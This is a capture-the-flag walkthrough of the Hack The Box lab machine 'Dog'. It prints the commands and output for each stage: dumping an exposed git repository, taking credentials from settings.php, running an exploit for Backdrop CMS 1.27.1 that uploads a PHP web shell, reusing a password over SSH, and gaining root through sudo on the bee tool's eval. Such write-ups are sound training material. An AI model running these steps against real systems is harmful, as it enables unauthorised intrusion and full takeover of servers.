HTB | Dog
machine - https://app.hackthebox.com/machines/Dog
IP - 10.10.11.58
NMAP
└─$ nmap -sT -p- --min-rate 1000 10.10.11.58 -Pn -oA nmap_ports
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-23 13:21 IST
Nmap scan report for 10.10.11.58
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 87.84 secondsStarting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-23 13:23 IST
Nmap scan report for 10.10.11.58
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (<https://backdropcms.org>)
|_http-title: Home | Dog
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:<https://docs.backdro>...
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
Port 80
From the nmap we can see that /git is there, we can use git-dumper to dump the files
┌──(anurag㉿anurag)-[~/htb/dog/git]
└─$ git-dumper <http://10.10.11.58/> . 
Let’s visit the website
we also have login portal
Foothold/shell
Found MySQL credentials in settings.php
when trying to login via the credential we found on the CMS login page we get error for the username
Enumerating BackDrop CMS
To find valid user name I will be using this repo
we found the BackDrop CMS version
┌──(anurag㉿anurag)-[~/htb/dog/BackDropScan]
└─$ python BackDropScan.py --url <http://10.10.11.58/> --version
[+] Version: 1.27.1We have found valid username tiffany
└─$ python BackDropScan.py --url <http://10.10.11.58/> --userslist /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --userenum
[+] Valid username: john
[+] Valid username: tiffany we the credential we get from settings.php we can login
backDrop CMS Exploit via shell.tar.gz upload
we have found the Exploit via searchsploit
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ searchsploit backdrop 1.27.1
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) | php/webapps/52021.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ searchsploit -m php/webapps/52021.py
Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
URL: <https://www.exploit-db.com/exploits/52021>
Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
Codes: N/A
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/anurag/htb/dog/52021.py
Let’s run the script
└─$ python 52021.py <http://10.10.11.58>
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to <http://10.10.11.58/admin/modules/install> and upload the shell.zip for Manual Installation.
Your shell address: <http://10.10.11.58/modules/shell/shell.php>
Find the place to upload the module. This is different from the location of the POC, and only accepts files in tar tgz gz bz2 format. Just repackage it.
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ tar -cvzf shell.tar.gz shell
shell/
shell/shell.info
shell/shell.php
we were able to execute commands
<http://10.10.11.58/modules/shell/shell.php?cmd=id>
We can see there are two users, Let’s reuse the password and see whearter we can SSH or not
and we are in as johncusack
found user.txt
johncusack@dog:~$ ls
user.txtPriv Esc
johncusack have sudo rights over (ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$
View /usr/local/bin/beethe help document and see that you can execute commands
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.We can use this eval to get the root shell
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash")'
[sudo] password for johncusack:
root@dog:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@dog:/var/www/html#
and we have root.txt
root@dog:/# cd /root
root@dog:~# ls
root.txtLast updated